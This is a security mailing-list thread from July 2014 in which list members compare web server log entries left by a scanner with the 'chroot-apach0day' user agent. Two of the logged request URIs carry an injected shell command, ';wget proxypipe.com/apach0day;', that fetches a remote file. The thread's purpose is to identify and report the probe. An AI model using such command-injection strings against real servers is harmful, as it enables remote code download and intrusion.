Would this be a reverse honeypot ? :) I just got a hit also on my sensor:
162.253.66.77 - - [28/Jul/2014:17:54:00 +0000] "GET /?x0a/x04/x0a/x02/x06/x08/x09/cDDOSpart3dns;wget%20proxypipe.com/apach0day; HTTP/1.0" 200 8687 "-" "chroot-apach0day" Oleg. On Mon, Jul 28, 2014 at 2:38 PM, Eric Buckingham <er...@proxypipe.com> wrote: > Looks like an attempt by somebody to troll us sadly :/ > > > On Mon, Jul 28, 2014 at 2:18 PM, Jim Halfpenny <jim.halfpe...@gmail.com> > wrote: > >> It didn't take long to get a pcap of this request, I started httpd on >> a random VPS of mine and it's the only request I have received so far. >> At first glance it doesn't seem like anything special. >> >> Jim >> >> On 28 July 2014 15:54, Robin Wood <robin@digi.ninja> wrote: >> > >> > >> > >> > On 28 July 2014 15:30, Frank Michael <frankcmich...@gmail.com> wrote: >> >> >> >> Various sources confirming the same thing for other sites. All on 7/28. >> >> Keep an eye open. >> >> >> > >> > I've just mailed the SANS ISC about it saying that others had seen it, >> see >> > if they come back with anything. >> > >> > Robin >> > >> >> >> >> On Jul 28, 2014, at 5:09 AM, Robin Wood <robin@digi.ninja> wrote: >> >> >> >> I've got a site that was scanned this morning by a tool that left these >> >> entries in the logs: >> >> >> >> [HTTP_USER_AGENT] => chroot-apach0day >> >> [HTTP_REFERRER] => /xA/x0a/x05 >> >> [REQUEST_URI] => >> >> /?x0a/x04/x0a/x04/x06/x08/x09/cDDOSv2dns;wget% >> 20proxypipe.com/apach0day; >> >> >> >> Anyone recognise it? That user agent isn't coming up in google >> searches. >> >> >> >> Robin >> >> >> >> _______________________________________________ >> >> >> >> Pauldotcom mailing list >> >> Pauldotcom@mail.securityweekly.com >> >> http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom >> >> Main Web Site: http://pauldotcom.com >> >> >> >> >> >> _______________________________________________ >> >> Pauldotcom mailing list >> >> Pauldotcom@mail.securityweekly.com >> >> http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom >> >> Main Web Site: http://pauldotcom.com >> > >> > >> > >> > _______________________________________________ >> > Pauldotcom mailing list >> > Pauldotcom@mail.securityweekly.com >> > http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom >> > Main Web Site: http://pauldotcom.com >> _______________________________________________ >> Pauldotcom mailing list >> Pauldotcom@mail.securityweekly.com >> http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom >> Main Web Site: http://pauldotcom.com >> > > > _______________________________________________ > Pauldotcom mailing list > Pauldotcom@mail.securityweekly.com > http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom > Main Web Site: http://pauldotcom.com >
_______________________________________________ Pauldotcom mailing list Pauldotcom@mail.securityweekly.com http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom Main Web Site: http://pauldotcom.com
